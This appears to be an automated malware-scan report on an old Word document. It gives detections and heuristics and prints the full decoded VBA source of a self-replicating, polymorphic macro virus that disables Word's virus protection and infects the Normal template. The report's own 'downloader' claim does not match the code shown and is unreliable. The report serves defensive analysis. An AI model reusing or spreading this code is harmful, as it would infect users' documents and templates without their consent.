MALICIOUS (Risk Score: 280)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing multiple VBA macros, including autoexecuting ones like AutoOpen and Document_Open. These macros are designed to execute arbitrary code, as indicated by the ClamAV detections 'Doc.Trojan.Psy-1' and 'Win.Trojan.W-420'. The VBA code attempts to obfuscate its actions and modify the document's code, suggesting it's a downloader for a secondary stage.
Heuristics (6)
- ClamAV: Doc.Trojan.Psy-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Psy-1
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15433 bytes |

SHA-256: babb2c25c85b088e79b423422b193ca9f63bda486fd71489c44fa48bafa9e3e7
Detection (ClamAV): Win.Trojan.W-420
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ThisDocument1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub autoopen(): psycode: End Sub
Private Sub document_open(): psycode: End Sub
Private Sub autoclose(): psycode: End Sub
Private Sub document_close(): psycode: End Sub
Private Sub psycode()
Application.ShowVisualBasicEditor = 0
If Len(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.lines(1, 5)) <> Len(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.lines(1, 5)) Then ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: psycodeX
End Sub
Private Sub psycodeX()
On Error Resume Next
Options.VirusProtection = 0: EnableCancelKey = 0
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
newcode
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString (.lines(.ProcStartLine("autoexec", 0), .CountOfLines - .ProcStartLine("autoexec", 0) + 1))
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString (.lines(1, 4))
End With
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
.replaceline .ProcStartLine("autoexec", 0), "private sub psycode"
For x = .CountOfLines - 8 To .CountOfLines
crap = ""
For y = 0 To 20 + Int(Rnd * 20)
crap = crap & Chr$(32 + Int(Rnd * 224))
Next y
.replaceline x, .lines(x, 1) & "'" & crap
Next x
End With
With ActiveDocument
.SaveAs .FullName
End With
End Sub
Private Sub newcode()
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
c = (128 + Int(Rnd * 128))
.replaceline .ProcStartLine("autoexec", 0) + 1, "c=" & c
.replaceline .ProcStartLine("autoexec", 0) + 2, "a1=" & Chr$(34) & Chr$(34)
.replaceline .ProcStartLine("autoexec", 0) + 3, "a2=" & Chr$(34) & Chr$(34)
.replaceline .ProcStartLine("autoexec", 0) + 4, "a3=" & Chr$(34) & Chr$(34)
.replaceline .ProcStartLine("autoexec", 0) + 5, "a4=" & Chr$(34) & Chr$(34)
s = UCase$(.lines(1, (.CountOfLines)))
For k = 1 To Len(s)
t = Mid$(s, k, 1)
If Asc(t) < 90 And Asc(t) > 65 Then t = Chr$(Asc(t) + Int(Rnd * 2) * 32)
p = p & t
Next k
For x = 1 To Len(p): b = b & Chr$(Asc(Mid$(p, x, 1)) Xor c): Next x
.replaceline .ProcStartLine("autoexec", 0) + 2, "a1=" & Chr$(34) & Mid$(b, 1, 1016) & Chr$(34)
.replaceline .ProcStartLine("autoexec", 0) + 3, "a2=" & Chr$(34) & Mid$(b, 1017, 1016) & Chr$(34)
.replaceline .ProcStartLine("autoexec", 0) + 4, "a3=" & Chr$(34) & Mid$(b, 2033, 1016) & Chr$(34)
.replaceline .ProcStartLine("autoexec", 0) + 5, "a4=" & Chr$(34) & Mid$(b, 3049) & Chr$(34)
End With
End Sub
Private Sub autoquit()
newcode
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
.DeleteLines 1, .ProcStartLine("autoexec", 0) - 1
End With
NormalTemplate.Save
End Sub
Private Sub toolsoptions()
Options.VirusProtection = 1
Dialogs(974).Show
Options.VirusProtection = 1
End Sub
Private Sub viewvbcode()
If Day(Now()) <> 28 Or Month(Now()) <> 51 Then GoTo bye
a = "psycode v?.?? may 28 1999"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Screen Saver.Marquee", "Text") = a
With Assistant
.Visible = 1
.Animation = 25
With Assistant.NewBalloon
.Heading = a
.Show
End With
.Visible = 0
End With
bye: End Sub
Private Sub autoexec()
c = 0
a1 = ""
a2 = ""
a3 = ""
a4 = ""
a = a1 & a2 & a3 & a4
For x = 1 To Len(a)
b = b & Chr$(Asc(Mid$(a, x, 1)) Xor c)
Next x
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
.DeleteLines 1, .CountOfLines
.AddFromString b
End With
End Sub
' Processing file: /opt/analyzer/scan_staging/77901a650a394b50aa0080e06b5586db.bin
' ========
```
... (truncated)